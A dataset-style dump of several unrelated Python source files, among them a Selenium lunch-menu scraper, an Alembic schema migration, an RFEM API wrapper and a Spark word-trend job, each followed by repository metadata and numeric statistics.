] | null | null | null | pyiArduinoI2Cmotor/__init__.py | tremaru/pyiArduinoI2Cmotor | 5e83c4ab1beaf6041663f4399028a5d3f5fa3f56 | [
"MIT"
] | null | null | null | pyiArduinoI2Cmotor/__init__.py | tremaru/pyiArduinoI2Cmotor | 5e83c4ab1beaf6041663f4399028a5d3f5fa3f56 | [
"MIT"
] | null | null | null | name = "pyiArduinoI2Cmotor"
| 14 | 27 | 0.785714 | 2 | 28 | 11 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.107143 | 28 | 1 | 28 | 28 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
e5ac46d95f62c31e2cdcf0a830026f35e4bd572a | 620 | py | Python | code/python/echomesh/output/Registry.py | rec/echomesh | be668971a687b141660fd2e5635d2fd598992a01 | [
"MIT"
] | 30 | 2015-02-18T14:07:00.000Z | 2021-12-11T15:19:01.000Z | code/python/echomesh/output/Registry.py | rec/echomesh | be668971a687b141660fd2e5635d2fd598992a01 | [
"MIT"
] | 16 | 2015-01-01T23:17:24.000Z | 2015-04-18T23:49:27.000Z | code/python/echomesh/output/Registry.py | rec/echomesh | be668971a687b141660fd2e5635d2fd598992a01 | [
"MIT"
] | 31 | 2015-03-11T20:04:07.000Z | 2020-11-02T13:56:59.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.util.registry.Module import register
from echomesh.output.OutputCache import OutputCache
REGISTRY = register(
__name__,
'Bidirectional',
'Offset',
'Output',
'Map',
'Spi',
'Test',
'Visualizer',
)
OUTPUT_CACHE = OutputCache()
def make_output(data):
if isinstance(data, dict):
return REGISTRY.make_from_description(data, default_type='output')
else:
return OUTPUT_CACHE.get_output(data)
def pause_outputs():
from echomesh.output.Output import pause_outputs
pause_outputs()
| 22.142857 | 82 | 0.73871 | 72 | 620 | 6.069444 | 0.527778 | 0.08238 | 0.08238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162903 | 620 | 27 | 83 | 22.962963 | 0.842004 | 0 | 0 | 0 | 0 | 0 | 0.082258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5ad2e5b2f0edde8b2e2a850a9a192abd378fd9f | 1,221 | py | Python | pihkaparser.py | K4ldun/slack-starterbot | e0c1468df3b343715cf88f66b5cdb959daa25c0e | [
"MIT"
] | null | null | null | pihkaparser.py | K4ldun/slack-starterbot | e0c1468df3b343715cf88f66b5cdb959daa25c0e | [
"MIT"
] | null | null | null | pihkaparser.py | K4ldun/slack-starterbot | e0c1468df3b343715cf88f66b5cdb959daa25c0e | [
"MIT"
] | null | null | null | from selenium import webdriver #Browser control with options/waits/exceptions.
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import json
def main():
opts = Options()
opts.add_argument('--headless')
opts.add_argument('--disable-gpu')
opts.add_argument('window-size=1000,1000')
driver = webdriver.Chrome(options=opts)
#print "Getting info for username " + username
driver.get("http://lintulahti.pihka.fi/")
html_source = driver.page_source.encode("utf-8")
soup = BeautifulSoup(html_source, 'html.parser')
menu = dict()
day_elems = soup.findAll('div', { "class": ["menu-day"] })
for elem in day_elems:
day = elem.find('h3')
day = unicode(day.span.string).strip()
foods = elem.findAll('li')
foodarray = []
for food in foods:
foodarray.append( unicode(food.span.string).strip() )
#print "" # Empty line
menu[day] = foodarray
driver.close()
return menu
def asString():
menu = main()
response = ""
for key in menu:
response += key + "\n"
foods = menu[key]
for food in foods:
response += food + "\n"
response += "\n"
return response
if __name__ == '__main__':
print asString()
| 23.480769 | 79 | 0.692056 | 163 | 1,221 | 5.08589 | 0.466258 | 0.043426 | 0.054282 | 0.033776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010763 | 0.162981 | 1,221 | 51 | 80 | 23.941176 | 0.800391 | 0.091728 | 0 | 0.052632 | 0 | 0 | 0.109502 | 0.019005 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.131579 | null | null | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ae60de2c631682842c6e19a0b866b268ecc7f0 | 203 | py | Python | learning_python/ex19.py | wcsten/Python-exercises- | cd025b37fa37d847d8ce4f3aff4be6f7b0b5d487 | [
"MIT"
] | null | null | null | learning_python/ex19.py | wcsten/Python-exercises- | cd025b37fa37d847d8ce4f3aff4be6f7b0b5d487 | [
"MIT"
] | null | null | null | learning_python/ex19.py | wcsten/Python-exercises- | cd025b37fa37d847d8ce4f3aff4be6f7b0b5d487 | [
"MIT"
] | null | null | null | # Ler dois valores (considere que não serão lidos valores iguais) e escrever o maior deles.
n1 = float(input('Numero 1:'))
n2 = float(input('Numero 2: '))
if n1 > n2:
print(n1)
else:
print(n2)
| 20.3 | 91 | 0.660099 | 33 | 203 | 4.060606 | 0.727273 | 0.149254 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049689 | 0.206897 | 203 | 9 | 92 | 22.555556 | 0.782609 | 0.438424 | 0 | 0 | 0 | 0 | 0.169643 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5ae9ba55496f9a8c174dd1ac0caa3926485c92a | 2,277 | py | Python | RFEM/TypesForMembers/memberResultIntermediatePoints.py | Dlubal-Software/RFEM_Python_Client | 9e29c598dadf380d49677c463931f0be659ccc40 | [
"MIT"
] | 16 | 2021-10-13T21:00:11.000Z | 2022-03-21T11:12:09.000Z | RFEM/TypesForMembers/memberResultIntermediatePoints.py | Dlubal-Software/RFEM_Python_Client | 9e29c598dadf380d49677c463931f0be659ccc40 | [
"MIT"
] | 49 | 2021-10-19T13:18:51.000Z | 2022-03-30T08:20:17.000Z | RFEM/TypesForMembers/memberResultIntermediatePoints.py | Dlubal-Software/RFEM_Python_Client | 9e29c598dadf380d49677c463931f0be659ccc40 | [
"MIT"
] | 7 | 2021-10-13T06:06:24.000Z | 2022-03-29T17:48:39.000Z | from RFEM.initModel import ConvertToDlString, Model, clearAtributes
class MemberResultIntermediatePoint():
def __init__(self,
no: int = 1,
members: str = "",
point_count: int = 2,
uniform_distribution: bool = True,
distances = None,
comment: str = '',
params: dict = None,
model = Model):
"""
Args:
no (int): Member Result Intermediate Point Tag
members (str): Assigned Members
point_count (int): Assigned Point Number
uniform_distribution (bool): Uniform Distrubition Option
distances (list): Distances Table
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Result Intermediate Point
clientObject = model.clientModel.factory.create('ns0:member_result_intermediate_point')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Result Intermediate Point No.
clientObject.no = no
# Assigned Members
clientObject.members = ConvertToDlString(members)
# Point Count
clientObject.uniform_distribution = uniform_distribution
if uniform_distribution:
clientObject.point_count = point_count
else:
clientObject.distances = Model.clientModel.factory.create('ns0:member_result_intermediate_point.distances')
for i,j in enumerate(distances):
mlvlp = Model.clientModel.factory.create('ns0:member_result_intermediate_point_distances')
mlvlp.no = i+1
mlvlp.value = distances[i][0]
mlvlp.note = None
clientObject.distances.member_result_intermediate_point_distances.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
if params:
for key in params:
clientObject[key] = params[key]
# Add Member Result Intermediate Point to client model
model.clientModel.service.set_member_result_intermediate_point(clientObject)
| 36.725806 | 119 | 0.615283 | 212 | 2,277 | 6.462264 | 0.34434 | 0.078832 | 0.157664 | 0.190511 | 0.234307 | 0.146715 | 0.146715 | 0.146715 | 0.146715 | 0.10219 | 0 | 0.004505 | 0.317523 | 2,277 | 61 | 120 | 37.327869 | 0.877091 | 0.256478 | 0 | 0 | 0 | 0 | 0.079701 | 0.079701 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.032258 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5aecff027dc26da16498680b52ebce4340235d7 | 12,433 | py | Python | migrations/versions/bdeeeacbec4d_initial_schema.py | Innopoints/backend | 723565ba3f63914a7dab03346696d89e28060d64 | [
"MIT"
] | 1 | 2020-11-30T17:41:36.000Z | 2020-11-30T17:41:36.000Z | migrations/versions/bdeeeacbec4d_initial_schema.py | Innopoints/backend | 723565ba3f63914a7dab03346696d89e28060d64 | [
"MIT"
] | 34 | 2020-04-18T19:31:27.000Z | 2021-03-19T13:56:56.000Z | migrations/versions/bdeeeacbec4d_initial_schema.py | Innopoints/backend | 723565ba3f63914a7dab03346696d89e28060d64 | [
"MIT"
] | null | null | null | """Initial schema
Revision ID: bdeeeacbec4d
Revises:
Create Date: 2020-04-11 11:20:18.814141
"""
import json
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'bdeeeacbec4d'
down_revision = None
branch_labels = None
depends_on = None
DEFAULT_NOTIFICATIONS = {
'innostore': 'off',
'volunteering': 'off',
'project_creation': 'off',
'administration': 'off',
'service': 'email',
}
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('accounts',
sa.Column('full_name', sa.String(length=256), nullable=False),
sa.Column('group', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=128), nullable=False),
sa.Column('telegram_username', sa.String(length=32), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=False),
sa.Column('notification_settings', postgresql.JSONB(astext_type=sa.Text()), nullable=False, server_default=json.dumps(DEFAULT_NOTIFICATIONS)),
sa.PrimaryKeyConstraint('email')
)
op.create_table('colors',
sa.Column('value', sa.String(length=6), nullable=False),
sa.PrimaryKeyConstraint('value')
)
op.create_table('competences',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('products',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=False),
sa.Column('type', sa.String(length=128), nullable=True),
sa.Column('description', sa.String(length=1024), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column('addition_time', sa.DateTime(timezone=True), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name', 'type', name='unique product')
)
op.create_table('sizes',
sa.Column('value', sa.String(length=3), nullable=False),
sa.PrimaryKeyConstraint('value')
)
op.create_table('notifications',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('recipient_email', sa.String(length=128), nullable=False),
sa.Column('is_read', sa.Boolean(), nullable=False),
sa.Column('payload', postgresql.JSONB(astext_type=sa.Text()), nullable=True),
sa.Column('timestamp', sa.DateTime(timezone=True), nullable=False),
sa.Column('type', sa.Enum('purchase_status_changed', 'new_arrivals', 'claim_innopoints', 'application_status_changed', 'service', 'manual_transaction', 'project_review_status_changed', 'all_feedback_in', 'added_as_moderator', 'out_of_stock', 'new_purchase', 'project_review_requested', name='notificationtype'), nullable=False),
sa.ForeignKeyConstraint(['recipient_email'], ['accounts.email'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('static_files',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('mimetype', sa.String(length=255), nullable=False),
sa.Column('owner_email', sa.String(length=128), nullable=False),
sa.ForeignKeyConstraint(['owner_email'], ['accounts.email'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table('varieties',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('size', sa.String(length=3), nullable=True),
sa.Column('color', sa.String(length=6), nullable=True),
sa.ForeignKeyConstraint(['color'], ['colors.value'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['size'], ['sizes.value'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_images',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('variety_id', sa.Integer(), nullable=False),
sa.Column('image_id', sa.Integer(), nullable=False),
sa.Column('order', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('variety_id', 'order', deferrable='True', initially='DEFERRED', name='unique order indices')
)
op.create_table('projects',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=False),
sa.Column('image_id', sa.Integer(), nullable=True),
sa.Column('creation_time', sa.DateTime(timezone=True), nullable=False),
sa.Column('organizer', sa.String(length=128), nullable=True),
sa.Column('creator_email', sa.String(length=128), nullable=False),
sa.Column('admin_feedback', sa.String(length=1024), nullable=True),
sa.Column('review_status', sa.Enum('pending', 'approved', 'rejected', name='reviewstatus'), nullable=True),
sa.Column('lifetime_stage', sa.Enum('draft', 'ongoing', 'finalizing', 'finished', name='lifetimestage'), nullable=False),
sa.ForeignKeyConstraint(['creator_email'], ['accounts.email'], ),
sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('stock_changes',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('amount', sa.Integer(), nullable=False),
sa.Column('time', sa.DateTime(timezone=True), nullable=False),
sa.Column('status', sa.Enum('carried_out', 'pending', 'ready_for_pickup', 'rejected', name='stockchangestatus'), nullable=False),
sa.Column('account_email', sa.String(length=128), nullable=False),
sa.Column('variety_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table('activities',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=True),
sa.Column('description', sa.String(length=1024), nullable=True),
sa.Column('start_date', sa.DateTime(timezone=True), nullable=True),
sa.Column('end_date', sa.DateTime(timezone=True), nullable=True),
sa.Column('project_id', sa.Integer(), nullable=False),
sa.Column('working_hours', sa.Integer(), nullable=False),
sa.Column('reward_rate', sa.Integer(), nullable=False),
sa.Column('fixed_reward', sa.Boolean(), nullable=False),
sa.Column('people_required', sa.Integer(), nullable=False),
sa.Column('telegram_required', sa.Boolean(), nullable=False),
sa.Column('application_deadline', sa.DateTime(timezone=True), nullable=True),
sa.Column('feedback_questions', sa.ARRAY(sa.String(length=1024)), nullable=False),
sa.Column('internal', sa.Boolean(), nullable=False, server_default='False'),
sa.CheckConstraint('(fixed_reward AND working_hours = 1) OR (NOT fixed_reward AND reward_rate = 70)', name='reward policy'),
sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name', 'project_id', name='name is unique inside a project')
)
op.create_table('project_files',
sa.Column('project_id', sa.Integer(), nullable=False),
sa.Column('file_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['file_id'], ['static_files.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ),
sa.PrimaryKeyConstraint('project_id', 'file_id')
)
op.create_table('project_moderation',
sa.Column('project_id', sa.Integer(), nullable=False),
sa.Column('account_email', sa.String(length=128), nullable=False),
sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], onupdate='CASCADE', ondelete='CASCADE'),
sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('project_id', 'account_email')
)
op.create_table('activity_competence',
sa.Column('activity_id', sa.Integer(), nullable=False),
sa.Column('competence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('activity_id', 'competence_id')
)
op.create_table('applications',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('applicant_email', sa.String(length=128), nullable=False),
sa.Column('activity_id', sa.Integer(), nullable=False),
sa.Column('comment', sa.String(length=1024), nullable=True),
sa.Column('application_time', sa.DateTime(timezone=True), nullable=False),
sa.Column('telegram_username', sa.String(length=32), nullable=True),
sa.Column('status', sa.Enum('approved', 'pending', 'rejected', name='applicationstatus'), nullable=False),
sa.Column('actual_hours', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['applicant_email'], ['accounts.email'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('applicant_email', 'activity_id', name='only one application')
)
op.create_table('feedback',
sa.Column('application_id', sa.Integer(), nullable=False),
sa.Column('time', sa.DateTime(timezone=True), nullable=False),
sa.Column('answers', sa.ARRAY(sa.String(length=1024)), nullable=False),
sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('application_id'),
sa.UniqueConstraint('application_id')
)
op.create_table('reports',
sa.Column('application_id', sa.Integer(), nullable=False),
sa.Column('reporter_email', sa.String(length=128), nullable=False),
sa.Column('time', sa.DateTime(timezone=True), nullable=False),
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('content', sa.String(length=1024), nullable=True),
sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ),
sa.ForeignKeyConstraint(['reporter_email'], ['accounts.email'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('application_id', 'reporter_email')
)
op.create_table('feedback_competence',
sa.Column('feedback_id', sa.Integer(), nullable=False),
sa.Column('competence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('feedback_id', 'competence_id')
)
op.create_table('transactions',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('account_email', sa.String(length=128), nullable=False),
sa.Column('change', sa.Integer(), nullable=False),
sa.Column('stock_change_id', sa.Integer(), nullable=True),
sa.Column('feedback_id', sa.Integer(), nullable=True),
sa.CheckConstraint('(stock_change_id IS NULL) OR (feedback_id IS NULL)', name='not(feedback and stock_change)'),
sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='SET NULL'),
sa.ForeignKeyConstraint(['stock_change_id'], ['stock_changes.id'], ondelete='SET NULL'),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('transactions')
op.drop_table('feedback_competence')
op.drop_table('reports')
op.drop_table('feedback')
op.drop_table('applications')
op.drop_table('activity_competence')
op.drop_table('project_moderation')
op.drop_table('project_files')
op.drop_table('activities')
op.drop_table('stock_changes')
op.drop_table('projects')
op.drop_table('product_images')
op.drop_table('varieties')
op.drop_table('static_files')
op.drop_table('notifications')
op.drop_table('sizes')
op.drop_table('products')
op.drop_table('competences')
op.drop_table('colors')
op.drop_table('accounts')
# ### end Alembic commands ###
| 50.54065 | 332 | 0.696292 | 1,490 | 12,433 | 5.681208 | 0.14094 | 0.086001 | 0.122268 | 0.133963 | 0.632605 | 0.606734 | 0.524631 | 0.47218 | 0.382044 | 0.270644 | 0 | 0.010424 | 0.120405 | 12,433 | 245 | 333 | 50.746939 | 0.763625 | 0.022762 | 0 | 0.257778 | 0 | 0 | 0.259969 | 0.013952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008889 | false | 0 | 0.017778 | 0 | 0.026667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5b00d7e128695512faf3dee89d09b98e4ae7a89 | 636 | py | Python | build/lib/DateTimeTools/DayNotoDate.py | pshustov/DateTimeTools | e542fd3f0e3c5290faad09b7cf8a2751132d4dd3 | [
"MIT"
] | null | null | null | build/lib/DateTimeTools/DayNotoDate.py | pshustov/DateTimeTools | e542fd3f0e3c5290faad09b7cf8a2751132d4dd3 | [
"MIT"
] | null | null | null | build/lib/DateTimeTools/DayNotoDate.py | pshustov/DateTimeTools | e542fd3f0e3c5290faad09b7cf8a2751132d4dd3 | [
"MIT"
] | null | null | null | import numpy as np
from ._CFunctions import _CDayNotoDate
from ._CTConv import _CTConv
def DayNotoDate(Year,Doy):
'''
Converts year and day numbers to a date of the format yyyymmdd.
Inputs
======
Year : int32
Array or scalar of years
Doy : int32
Array or scalar of day numbers
Returns
=======
Date : int
Array or scalar of dates
'''
#convert the inputs into the exact dtypes required for C++
_n = _CTConv(np.size(Doy),'c_int')
_Year = _CTConv(Year,'c_int_ptr')
_Doy = _CTConv(Doy,'c_int_ptr')
_Date = np.zeros(_n,dtype='int32')
#call the C++ function
_CDayNotoDate(_n,_Year,_Doy,_Date)
return _Date
| 19.272727 | 64 | 0.698113 | 98 | 636 | 4.295918 | 0.479592 | 0.049881 | 0.092637 | 0.106888 | 0.095012 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011696 | 0.193396 | 636 | 32 | 65 | 19.875 | 0.808967 | 0.522013 | 0 | 0 | 0 | 0 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5b241b8fb352b546133a594008c04d79660503c | 4,996 | py | Python | BigDataArchitecture/application_pod/application.py | Brebeck-Jan/AlphaBigDataTech | df7b63056e7067e366e72193ec8260dbc59b53bb | [
"MIT"
] | null | null | null | BigDataArchitecture/application_pod/application.py | Brebeck-Jan/AlphaBigDataTech | df7b63056e7067e366e72193ec8260dbc59b53bb | [
"MIT"
] | null | null | null | BigDataArchitecture/application_pod/application.py | Brebeck-Jan/AlphaBigDataTech | df7b63056e7067e366e72193ec8260dbc59b53bb | [
"MIT"
] | null | null | null | ##########################################################################################
##########################################################################################
# BigData - Application #
##########################################################################################
##########################################################################################
##########################################################################################
# import libraries #
##########################################################################################
import findspark
findspark.init()
from pyspark.sql import SparkSession
import happybase
from nltk.corpus import stopwords
import nltk
import pandas as pd
import pymongo
import sys
nltk.download("stopwords")
import time
##########################################################################################
# init spark #
##########################################################################################
spark=SparkSession.builder\
.master("local[*]")\
.appName("application")\
.getOrCreate()
sc=spark.sparkContext
##########################################################################################
# prerequisites #
##########################################################################################
# delete umlauts
def umlauts(word):
tempVar = word
tempVar = tempVar.replace('ä', 'ae')
tempVar = tempVar.replace('ö', 'oe')
tempVar = tempVar.replace('ü', 'ue')
tempVar = tempVar.replace('Ä', 'Ae')
tempVar = tempVar.replace('Ö', 'Oe')
tempVar = tempVar.replace('Ü', 'Ue')
tempVar = tempVar.replace('ß', 'ss')
return tempVar
# exclude punctuation
def lower_clean_str(x):
punc='!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~-„“'
lowercased_str = x.lower()
for ch in punc:
lowercased_str = lowercased_str.replace(ch, ' ')
return lowercased_str
##########################################################################################
# Application #
##########################################################################################
def application(news):
# create Pipelined RDD
df = sc.parallelize(news)
# remove punktuation and transform to lowercase
df = df.map(lower_clean_str)
#split sentences into list of words
df = df.flatMap(lambda satir: satir.split(" "))
# exclude whitespaces
df = df.filter(lambda x:x!='')
# count how many times each word occurs
count = df.map(lambda word:(word,1))
countRBK = count.reduceByKey(lambda x,y:(x+y)).sortByKey()
# rank words
countRBK = countRBK.map(lambda x:(x[1],x[0]))
countRBK = countRBK.sortByKey(False)
# get german stopwords and change their umlauts
stops =stopwords.words('german')
german_stopwords = []
for word in stops:
german_stopwords.append(umlauts(word))
# delete stopwords
countRBK = countRBK.filter(lambda x: x[1] not in german_stopwords)
# write result into pandas dataframe and export
export = pd.DataFrame(columns=['trend-word'])
for i in range(5):
export = export.append({'trend-word': countRBK.take(5)[i][1]}, ignore_index=True)
return export
##########################################################################################
# attaching database #
##########################################################################################
def data_from_datalake():
connection = happybase.Connection(host='lake-connection', port=9090, autoconnect=True)
table = connection.table('crawled_articles')
news = []
for k, data in table.scan():
news.append(data[b'data:title'].decode('utf-8'))
connection.close()
return news
##########################################################################################
# Run Application with Data #
##########################################################################################
def write_mongo(result):
# Create a MongoDB client
print(result)
# client = pymongo.MongoClient('mongodb://mongo-container:27017')
client = pymongo.MongoClient('mongodb://mongo-connection:27017')
# client = pymongo.MongoClient('mongodb://mongo-0.mongo-service')
# Specify the database to be used
db = client.news
# Specify the collectionlection to be used
collection = db.newscollection
dao_object = {"cat":"all","titles":[]}
# Insert a single document
for i in range(len(result)):
dao_object["titles"].append(result.iloc[i,0])
collection.update_one({"cat":"all"},{"$set": dao_object},upsert=True)
# Close the connection
client.close()
# run whole application
write_mongo(application(data_from_datalake()))
# time sleep, that the pod gets rebuild after completion
time.sleep(500) | 37.007407 | 90 | 0.45036 | 423 | 4,996 | 5.264775 | 0.420804 | 0.044005 | 0.066008 | 0.04176 | 0.127077 | 0.110912 | 0.074091 | 0.074091 | 0.074091 | 0.074091 | 0 | 0.006508 | 0.169536 | 4,996 | 135 | 91 | 37.007407 | 0.530007 | 0.232186 | 0 | 0 | 0 | 0 | 0.08044 | 0.013548 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.128571 | 0 | 0.257143 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5b26b56fc6da7a7d52f30abc550181b0a2029e2 | 112 | py | Python | src/nwb_datajoint/data_import/__init__.py | jihyunbak/spyglass | 780fe2c101db60d42a1b73ad8fd729db42620ba6 | [
"MIT"
] | 14 | 2020-02-04T20:05:02.000Z | 2022-03-13T18:13:20.000Z | src/nwb_datajoint/data_import/__init__.py | jihyunbak/spyglass | 780fe2c101db60d42a1b73ad8fd729db42620ba6 | [
"MIT"
] | 118 | 2020-06-15T16:40:48.000Z | 2022-03-21T17:25:47.000Z | src/nwb_datajoint/data_import/__init__.py | jihyunbak/spyglass | 780fe2c101db60d42a1b73ad8fd729db42620ba6 | [
"MIT"
] | 16 | 2020-02-04T19:04:07.000Z | 2022-03-18T21:15:32.000Z | from .insert_sessions import insert_sessions
from .storage_dirs import base_dir, check_env, kachery_storage_dir
| 37.333333 | 66 | 0.875 | 17 | 112 | 5.352941 | 0.647059 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089286 | 112 | 2 | 67 | 56 | 0.892157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
